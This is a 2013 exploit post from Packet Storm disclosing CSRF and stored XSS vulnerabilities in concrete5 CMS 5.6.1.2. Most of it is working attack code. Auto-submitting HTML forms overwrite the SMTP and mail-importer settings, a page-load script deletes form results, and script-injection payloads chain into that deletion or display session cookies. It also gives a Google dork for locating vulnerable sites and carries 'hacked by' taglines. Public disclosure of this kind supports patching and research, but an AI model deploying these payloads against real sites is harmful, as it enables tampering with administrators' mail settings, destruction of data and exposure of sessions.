Concrete5 CMS 5.6.1.2 Cross Site Request Forgery / Cross Site Scripting

2013-06-10T00:00:00
ID PACKETSTORM:121965
Type packetstorm
Reporter expl0i13r
Modified 2013-06-10T00:00:00

Description

                                        
                                            `=============================================================  
__ __ _ ___ _ __ ____   
\ \ / / | | / _ \ (_) /_ | |___ \   
___ \ V / _ __ | | | | | | _ | | __) | _ __  
/ _ \ > < | '_ \ | | | | | | | | | | |__ < | '__|  
| __/ / . \ | |_) | | | | |_| | | | | | ___) | | |   
\___| /_/ \_\ | .__/ |_| \___/ |_| |_| |____/ |_|   
| |   
|_| blackpentesters.blogspot.com  
=============================================================  
  
###########################################################################################  
# Exploit Title: [ concrete5 CMS v5.6.1.2 Multiple CSRF and Stored XSS Vulnerabilities] #  
# Date: [2013-6-9] #  
# Exploit Author: [expl0i13r] #  
# Vendor Homepage: [http://www.concrete5.org/] #  
# Software Link: [http://www.concrete5.org/download_file/-/view/51635/8497/] #  
# Version: [5.6.1.2] #  
# Goole Dork: [Built with concrete5 - an open source CMS] #  
# Tested on: [Windows] #  
# Contact: expl0i13r@gmail.com #  
###########################################################################################  
  
Summary:  
========  
1. CSRF (Modify SMTP Settings)  
2. CSRF (Modify Mail Importers Settings)  
3. CSRF (Delete Form Results)  
4. Stored XSS  
  
  
1. CSRF (Modify SMTP Settings):  
================================  
  
concrete5 v5.6.1.2 suffers from multiple CSRF vulnerabilities one of which allow an attacker  
to modify "SMTP Settings" and "Send Mail Method" available at below URL :  
  
Affected URL:  
--------------  
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/  
  
  
----------------------------------------------------------------------------------------  
Note: Below code collects form details,send and update it, when Victim loads this page  
----------------------------------------------------------------------------------------  
  
<html>  
<head>  
<script type="text/javascript" language="javascript">  
function submitform()  
{  
document.getElementById('myForm').submit();  
}  
</script>  
</head>  
<body>  
<form name="myForm" method="post" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/save_settings/" class="form-horizontal" id="mail-settings-form" original-class="form-horizontal">  
  
<input type="radio" name="MAIL_SEND_METHOD" id="MAIL_SEND_METHOD2" value="SMTP" class="ccm-input-radio" checked>  
<input id="MAIL_SEND_METHOD_SMTP_SERVER" type="text" name="MAIL_SEND_METHOD_SMTP_SERVER" value="127.0.0.1" class="ccm-input-text">   
<input id="MAIL_SEND_METHOD_SMTP_USERNAME" type="text" name="MAIL_SEND_METHOD_SMTP_USERNAME" value="expl0i13r" class="ccm-input-text">   
<input id="MAIL_SEND_METHOD_SMTP_PASSWORD" type="text" name="MAIL_SEND_METHOD_SMTP_PASSWORD" value="expl0i13r" class="ccm-input-text">   
<select name="MAIL_SEND_METHOD_SMTP_ENCRYPTION" id="MAIL_SEND_METHOD_SMTP_ENCRYPTION" ccm-passed-value="SSL" class="ccm-input-select">  
<option value="">None</option>  
<option value="SSL" selected="selected">SSL</option>  
<option value="TLS">TLS</option></select>  
<input id="MAIL_SEND_METHOD_SMTP_PORT" type="text" name="MAIL_SEND_METHOD_SMTP_PORT" value="" class="ccm-input-text">   
  
</form>  
<script type="text/javascript" language="javascript">  
document.myForm.submit()  
</script>  
</body>  
</html>  
  
  
2. CSRF (Modify Mail Importer Settings)  
=========================================  
  
Below code exploits CSRF vulnerability which allows attacker to Edit and update "Importer Settings" details.  
  
Affected URL :  
---------------  
  
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/edit_importer/1/  
  
----------------------------------------------------------------------------------------  
Note: Below code collects form details,send and update them, when Victim loads this page  
----------------------------------------------------------------------------------------  
  
<html>  
<head>  
<script type="text/javascript" language="javascript">  
  
function submitform()  
{  
document.getElementById('myForm').submit();  
  
}  
  
</script>  
</head>  
  
<body>  
  
<form name = "myForm" method="post" id="mail-importer-form" class="form-horizontal" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/" original-class="form-horizontal">  
  
<input type="hidden" name="miID" id="miID" value="1">   
<input id="miEmail" type="text" name="miEmail" value="exploiter">  
<input id="miServer" type="text" name="miServer" value="127.0.0.1" class="ccm-input-text">   
<input id="miUsername" type="text" name="miUsername" value="" class="ccm-input-text">   
<input id="miPassword" type="text" name="miPassword" value="" class="ccm-input-text"> <input id="miPort" type="text" name="miPort" value="8080" class="ccm-input-text">   
  
<select name="miEncryption" id="miEncryption" ccm-passed-value="" class="ccm-input-select">  
<option value="" selected="selected">None</option>  
</select>  
  
<select name="miIsEnabled" id="miIsEnabled" ccm-passed-value="1" class="ccm-input-select">  
<option value="1" selected="selected">Yes</option>  
</select>   
  
<select name="miConnectionMethod" id="miConnectionMethod" ccm-passed-value="POP" class="ccm-input-select">  
<option value="POP" selected="selected">POP</option>  
</select>   
  
<script type="text/javascript" language="javascript">  
document.myForm.submit()  
</script>  
  
</body>  
</html>  
  
  
3. CSRF (Delete Form Results)  
===============================  
  
Each Submissions available at "REPORTS" > "Form Results" page has static "qsID" assigned, using which attacker can delete submissions.  
  
Ex.  
---  
When we install this CMS, "Contact Us" form by default available at URL : http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/blog/hello-world/about/contact-us/  
  
For above "Contact Form", qsID in my case is "1370626098", which can be found at url:  
  
--------------------------------------------------------------------------------------  
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/  
--------------------------------------------------------------------------------------  
  
<a href="/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers" class="btn small error delete-form-answers ccm-button-v2-left">Delete Submissions</a>  
------------------------------------------------------------------------------------------------------  
  
In order to exploit this CSRF, attacker must have "qsID" values, for which attacker needs to have at least Limited access to CMS.  
  
Steps:  
------  
  
1. Attacker logs in to CMS  
2. Navigates to "http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/"  
3. Gets Static "qsID" value from source code  
4. Use "qsID" to create below CSRF exploit  
  
Code:  
-------  
  
<html>  
<head>  
<script>  
function delete()  
{  
  
# Delete Submissins "Contact Us" page  
  
window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers")  
  
}  
</script>  
</head>  
<body onload="delete()">  
</body>  
</html>  
  
  
4. Multiple Stored XSS  
=======================  
  
concrete5 CMS also suffers from Stored XSS vulnerability, which can be used to "Delete Form Results"  
everytime page is loaded.  
  
Stored XSS-1  
============  
  
URL:  
----  
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/users/add_group/  
  
Vulnerable Parameter:  
----------------------  
<input type="text" name="gName" class="span6" value="" id="acpro_inp2">  
  
  
XSS-CSRF Payload:  
------------------  
  
"><script>window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers");alert('Form Result Data Deleted - eXpl0i13r')</script>  
  
  
Stored XSS-2:  
=============  
  
URL:  
-----  
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/attributes/sets/  
  
Vulnerable Parameter:  
----------------------  
<input id="asName" type="text" name="asName" value="" class="ccm-input-text">  
  
Payload:  
---------  
  
"><script>alert('hacked by eXpl0i13r\n'+document.cookie)</script>  
  
  
##################################  
# eXpl0i13r #  
# ------------------------------ #  
#|blackpentesters.blogspot.com |#  
#|infotech-knowledge.blogspot.in|#  
# ------------------------------ #  
##################################  
  
`